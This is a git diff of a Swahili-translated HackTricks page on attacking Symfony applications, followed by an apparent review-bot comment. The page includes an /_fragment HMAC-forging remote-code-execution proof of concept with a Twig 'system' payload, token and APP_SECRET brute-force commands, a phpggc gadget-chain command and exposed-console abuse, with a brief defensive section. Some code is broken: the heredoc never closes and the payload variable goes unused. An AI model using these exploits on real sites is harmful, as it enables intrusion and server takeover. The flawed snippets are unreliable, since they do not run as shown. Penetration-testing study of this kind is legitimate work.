Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Translator 2025-07-23 10:25:30 +00:00
parent 5497ac0113
commit 63283f24db


@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Angalia machapisho yafuatayo:
Symfony ni moja ya mifumo maarufu zaidi ya PHP na mara kwa mara inaonekana katika tathmini za malengo ya biashara, e-commerce na CMS (Drupal, Shopware, Ibexa, OroCRM … zote zinajumuisha vipengele vya Symfony). Ukurasa huu unakusanya vidokezo vya mashambulizi, makosa ya kawaida ya usanidi na udhaifu wa hivi karibuni unapaswa kuwa kwenye orodha yako ya ukaguzi unapogundua programu ya Symfony.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Kumbukumbu ya kihistoria: Sehemu kubwa ya mfumo bado inatumia tawi la **5.4 LTS** (EOL **Novemba 2025**). Daima thibitisha toleo halisi la chini kwa sababu ya taarifa nyingi za usalama za 2023-2025 ambazo zilitatuliwa tu katika toleo za patch (mfano 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Finger-printing
* Vichwa vya majibu ya HTTP: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` au vidakuzi vinavyoanza na `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Mvuvi wa msimbo wa chanzo (`composer.json`, `composer.lock`, `/vendor/…`) mara nyingi huonyesha toleo halisi:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Njia za umma ambazo zipo tu kwenye Symfony:
* `/_profiler` (Symfony **Profiler** & toolbar ya debug)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (kurasa za makosa nzuri)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (wasimamizi wa mbele wa dev kabla ya 4.0)
* Wappalyzer, BuiltWith au orodha za maneno za ffuf/feroxbuster: `symfony.txt` → angalia `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Faili & mwisho wa kuvutia
| Njia | Kwa nini ni muhimu |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Mara nyingi huwekwa vibaya → inavuja `APP_SECRET`, DB creds, SMTP, funguo za AWS |
| `/.git`, `.svn`, `.hg` | Ufunuo wa chanzo → akidi + mantiki ya biashara |
| `/var/log/*.log`, `/log/dev.log` | Usanidi mbaya wa mizizi ya wavuti unaonyesha stack-traces |
| `/_profiler` | Historia kamili ya maombi, usanidi, chombo cha huduma, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Kituo cha kuingia kinachotumiwa na ESI/HInclude. Unyanyasaji unawezekana mara tu unajua `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE ikiwa inapatikana (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & wakati mwingine inavuja nyaraka za makosa |
---
## Udhaifu wa Juu (2023-2025)
### 1. Ufunuo wa APP_SECRET ➜ RCE kupitia `/_fragment` (pia inajulikana kama “secret-fragment”)
* **CVE-2019-18889** awali, lakini *bado* inaonekana kwenye malengo ya kisasa wakati debug imeachwa ikiwa hai au `.env` inafichuliwa.
* Mara tu unavyojua `APP_SECRET` ya herufi 32, tengeneza token ya HMAC na unyanyasaji chombo cha ndani `render()` ili kutekeleza Twig isiyo ya kawaida:
```python
# PoC inahitaji siri
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE katika Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Andiko bora na skripti ya unyanyasaji: blog ya Ambionics (iliyojumuishwa katika Marejeleo).
### 2. Windows Process Hijack CVE-2024-51736
* Kipengele cha `Process` kilitafuta saraka ya kazi ya sasa **kabla** ya `PATH` kwenye Windows. Mshambuliaji anayeweza kupakia `tar.exe`, `cmd.exe`, nk. katika mizizi ya wavuti inayoweza kuandikwa na kuanzisha `Process` (mfano, uondoaji wa faili, uzalishaji wa PDF) anapata utekelezaji wa amri.
* Imefanyiwa marekebisho katika 5.4.50, 6.4.14, 7.1.7.
### 3. Session-Fixation CVE-2023-46733
* Mlinzi wa uthibitishaji alitumia kitambulisho cha kikao kilichopo baada ya kuingia. Ikiwa mshambuliaji anaweka cookie **kabla** ya mwathirika kujiandikisha, wanachukua akaunti baada ya kuingia.
### 4. Twig sandbox XSS CVE-2023-46734
* Katika programu zinazofichua templeti zinazodhibitiwa na mtumiaji (CMS ya admin, mjenzi wa barua pepe) chujio cha `nl2br` kinaweza kutumiwa vibaya ili kupita sandbox na kuingiza JS.
### 5. Symfony 1 gadget chains (bado zinapatikana katika programu za urithi)
* `phpggc symfony/1 system id` inazalisha payload ya Phar inayosababisha RCE wakati `unserialize()` inatokea kwenye madarasa kama `sfNamespacedParameterHolder`. Angalia mwisho wa kupakia faili na vifungashio vya `phar://`.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Cheat-Sheet ya Unyanyasaji
### Hesabu token ya HMAC kwa `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce dhaifu `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE kupitia Symfony Console iliyo wazi
Ikiwa `bin/console` inapatikana kupitia `php-fpm` au upakuaji wa moja kwa moja wa CLI:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Tumia gadgets za deserialization ndani ya directory ya cache au andika template mbaya ya Twig ambayo itatekelezwa kwenye ombi linalofuata.
---
## Maelezo ya kujihami
1. **Usiweke debug** (`APP_ENV=dev`, `APP_DEBUG=1`) kwenye uzalishaji; zuia `/app_dev.php`, `/_profiler`, `/_wdt` katika usanidi wa seva ya wavuti.
2. Hifadhi siri katika env vars au `vault/secrets.local.php`, *kamwe* si katika faili zinazopatikana kupitia mizizi ya hati.
3. Lazimisha usimamizi wa patch jiandikishe kwa matangazo ya usalama ya Symfony na uweke angalau kiwango cha LTS patch.
4. Ikiwa unatumia Windows, sasisha mara moja ili kupunguza CVE-2024-51736 au ongeza ulinzi wa `open_basedir`/`disable_functions`.
---
### Zana za mashambulizi zinazofaa
* **ambionics/symfony-exploits** RCE ya kipande-siri, ugunduzi wa njia za debugger.
* **phpggc** Mifumo ya gadget iliyotengenezwa tayari kwa Symfony 1 & 2.
* **sf-encoder** msaidizi mdogo wa kuhesabu `_fragment` HMAC (uteuzi wa Go).
## Marejeleo
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}
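Review bot: the heredoc in the "Hesabu token ya HMAC kwa `/_fragment`" cheat-sheet is not valid shell as written: the terminator `PY` has to stand alone on its line, so `PY deadbeef… "template=@App/evil&filter=raw&_format=html"` never closes the heredoc and the script arguments are never passed; the arguments belong on the invocation line, i.e. `python - deadbeef… "template=@App/evil&filter=raw&_format=html" <<'PY'` with a bare `PY` at the end. Two smaller points in the same hunk: the second entry of the link list shows `hhttps://blog.flatt.tech/entry/2020/11/02/124807` as its visible text (the href itself is fine), and in the `/_fragment` Python PoC the variable `payload = "{{['id']|filter('system')}}"` is assigned but never referenced by `query`, so readers cannot tell what it is for; either remove it or say in the comment how it relates to the request. Finally, `# confirm it works` under "RCE kupitia Symfony Console" is the only code comment left untranslated in this Swahili file.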